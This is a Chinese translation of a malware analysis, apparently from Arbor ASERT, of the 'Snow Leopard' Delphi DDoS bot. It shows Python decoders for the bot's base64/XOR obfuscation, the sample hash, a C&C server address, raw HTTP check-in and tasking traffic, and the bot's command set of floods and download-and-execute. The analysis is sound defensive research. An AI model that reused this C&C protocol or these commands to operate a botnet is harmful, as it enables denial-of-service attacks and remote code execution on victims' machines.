@malpush把Tweet中的木马雪豹暴露到了我们Arbor的无线电探测器中,此次的木马表现是在Tweet中显示一个网址,当你填入信息后,他会通往一个指令和控制面板(C&C)如下所示:
这一现象使我深信我应更深入地了解雪豹。巧合的是对于Arbor来说,这一恶意程序结果竟是DDos(分布式拒绝服务攻击)僵尸程序。
恶意程序样例
分析研究样例可以在malwr查找到 (MD5: 4fa91b76294d849d01655ffb72b30981)。
这是用Delphi编写的恶意软件包括以下几种形式: UPX填充,字符串模糊处理,反病毒机器,反调试,自我修改代码,过程挖空。
这种基于Delphi的使用和使用的面板部分的语言,很可能是起源于俄罗斯。
模糊处理
木马雪豹使用两种模糊处理方式;它们是 base64 和 XOR的联合。不同秘钥使用不同的部分。第一个模糊处理方式是用在字符串上,可以用下面的Python函数可以解码:
def decrypt_strings(msg, key): msg_no_b64 = base64.b64decode(msg) plain_buf = [] for i in range(len(msg_no_b64)): key_lsb = ord(key[i % len(key)]) & 0xf msg_lsb = ord(msg_no_b64[i]) & 0xf c = msg_lsb ^ key_lsb d = c ^ 0xa msg_slsb = ord(msg_no_b64[i]) & 0xf0 plain_byte = msg_slsb ^ d plain_buf.append(chr(plain_byte)) return “”.join(plain_buf)
下面是一些例子:
>>> decrypt_strings(“QG1wZ2xnPj4sZGNk”, “12xc3qwfhjeryTTYHH”) ‘Kernel32.dll’ >>> decrypt_strings(“TG12RGZveGBnSG5mZ2JrQg==”, “12xc3qwfhjeryTTYHH”) ‘GetModuleHandleA’ >>> decrypt_strings(“dWpkbXFqZmxi”, “mu#X”) ‘removeone’ >>> decrypt_strings(“cn9tY3Nqf2d1”, “mu#X”) ‘updatever’ >>> decrypt_strings(“ZXN8djotITgyOyQ0MD4mOD45Jzc5I2NmfS1kaXhzdCx+YXo=”, “GMrlZ8t3pypO3423423LpFqCUx”) ‘http://188.190.101.13/hor/input.php’
第二种方法主要用在C&C通信上,并且可按照下面Python函数清理:
def decrypt_cnc(msg, key): msg_no_b64 = base64.b64decode(msg) plain_buf = [] for offset, enc_byte in enumerate(msg_no_b64): plain_byte = ord(enc_byte) ^ ord(key[offset % len(key)]) plain_buf.append(chr(plain_byte)) return “”.join(plain_buf)
下面是一些例子:
>>> decrypt_cnc(“ChYJCRhta3k=”, “\x38”) ‘2.11 USA’ >>> decrypt_cnc(“DRhAAA4YeRgIXBgIUBgPVRgKAEs=”, “\x38”) ‘5 x86 A 0d 0h 7m 28s’
指令与控制
C&C是基于HTTP(超文本转移协议)。两种信息类型已经被识别出来了。第一种信息类型o或者是“背景连线通讯”就像这样:
POST /hor/input.php HTTP/1.0 Host: 188.190.101.13 User-Agent: Mozilla Gecko Firefox 25 Accept: text/plain Accept-Encoding: identity Accept-Language: en-EN,en Connection: Close Referer: http://mhome.br Content-Length: 106 Content-Type: application/x-www-form-urlencoded m=CA==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=&p=cHd1fQ==&v=ChYJCRhta3k=&s=DRhAAA4YeRgIXBgIUBgPVRgKAEs=
这就是它如何被解码的:
m=0&h=18803769021711750776216376939&p=HOME&v=2.11 USA&s=5 x86 A 0d 0h 7m 28s
它的POST参数是:
· m – Message type (0)
· h – Hash based on computer name
· p – Computer name
· v – Version and locale
· s – Windows version, architecture, user type, and uptime
背景连线通讯反应如下方:
HTTP/1.1 200 OK Date: Wed, 04 Dec 2013 14:48:27 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 32 Connection: close Content-Type: text/html; charset=UTF-8 dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN
被解码,这是在请求中使用的用户代理
>>> decrypt_cnc(“dVdCUVRUWRh/XVtTVxh+UUpdXldAGAoN”, “\x38”) ‘Mozilla Gecko Firefox 25’
第二种信息类型是1或者“指令调查”。 如下方:
POST /hor/input.php HTTP/1.0 Host: 188.190.101.13 User-Agent: Mozilla Gecko Firefox 25 Accept: text/plain Accept-Encoding: identity Accept-Language: en-EN,en Connection: Close Referer: http://udot.tk Content-Length: 49 Content-Type: application/x-www-form-urlencoded m=CQ==&h=CQAACAsPDgEICgkPCQkPDQgPDw4KCQ4LDw4BCwE=
被解码为:
m=1&h=18803769021711750776216376939
它的POST参数是:
· m – Message type (1)
· h – Hash based on computer name
调查反应样例:
HTTP/1.1 200 OK Date: Wed, 04 Dec 2013 12:56:16 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Content-Length: 72 Connection: close Content-Type: text/html; charset=UTF-8 UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=
被解码:
decrypt_cnc(“UExMSF5UV1dcElBMTEgCFxdMWUpfXUwWVl1MF1FWXF1AFkhQSBcSAAgSCQ0IEgg=”, “\x38”) ‘httpflood*http://target.net/index.php/*80*150*0’
指令被多个“*”限定,如下面格式:
command*arg1*arg2*arg3*arg4*arg5*arg6*arg7
指令
下面的bot(网络爬虫)指令已被识别:
· httpflood – HTTP GET flood
· httppost – HTTP POST flood
· udpflood – UDP flood
· synflood – TCP connect flood
· tcpflood – TCP flood
· download – download and execute (all bots)
· downloadone – download and execute (specified bot)
· update – update (all bots)
· updateos – update (specified OS)
· updateone – update (specified bot)
· updatever – update (specified version)
· removeos – remove bot (specified OS)
· removeone – remove bot (specified bot)
· s! – stop all floods
· su – stop UDP flood
· sh – stop HTTP flood
· ss – stop TCP SYN flood
· st – stop TCP flood
关于每个指令的更多信息,可在C&C面板内的“任务管理”一栏查找到。
注意:我在分析的二进制里看不到任何关于“memexec”或者“script”指令的引用。
指令和控制面板
总结起来,这便是指令和控制面板幕后的行程;“静态/指数”页面:
这便是“上传”页面:
部分“Bot清单”页面:
结论:
该篇分析了crypto(加密),C&C基础设施,与木马指令台。雪豹——一个新的DDoS bot(网络爬虫)程序很可能来自于俄罗斯。在写入的同时,仅有少量的独特样例与C&C服务器已经被识别了,那么这项新威胁之攻击规模和影响还有待确定。Arbor安全工程响应小组(ASERT)将会继续追踪雪豹病毒。
文章来源网络,作者:运维,如若转载,请注明出处:https://shuyeidc.com/wp/151452.html<
